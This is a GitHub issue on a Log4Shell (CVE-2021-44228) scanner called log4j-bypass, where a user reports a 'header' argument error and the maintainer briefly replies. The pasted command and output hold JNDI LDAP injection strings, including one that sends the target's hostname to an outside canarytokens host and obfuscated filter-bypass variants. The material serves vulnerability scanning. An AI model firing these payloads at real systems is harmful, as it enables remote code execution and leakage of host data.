cyberqueenmeg / log4j-bypass

MIT License

Header error #1

Open r3l1c7 opened 2 years ago

r3l1c7 commented 2 years ago

root@rootvps:~/tools/log4j-bypass# python3 bypass.py -u https://hackerone.com --callback-url "${jndi:ldap://x${hostName}.L4J.9dyildfdvpl3o0jlxm.canarytokens.com/a}" --header "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"

[•] CVE-2021-44228 - Apache Log4j RCE Exception Scanner
[•] Scanner provided by CyberQueenMeg
[•] If you are running this using the BlackArch library and scanning a list of URLs, put them in /usr/share/log4j-bypass to get the script to scan them
[•] Using [] for DNS callback.
[%] Checking for Log4j RCE CVE-2021-44228 and bypasses.
[•] URL: https://hackerone.com
[•] PAYLOAD: ${jndi:ldap://]
EXCEPTION: request() got an unexpected keyword argument 'header'
EXCEPTION: request() got an unexpected keyword argument 'header'
EXCEPTION: request() got an unexpected keyword argument 'header'
[•] PAYLOAD: {${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://}
EXCEPTION: request() got an unexpected keyword argument 'header'
EXCEPTION: request() got an unexpected keyword argument 'header'
EXCEPTION: request() got an unexpected keyword argument 'header'

cyberqueenmeg commented 1 year ago

Hi,

For whatever reason, I'm just seeing this now. Didn't get an email about it. I'll look into this later today.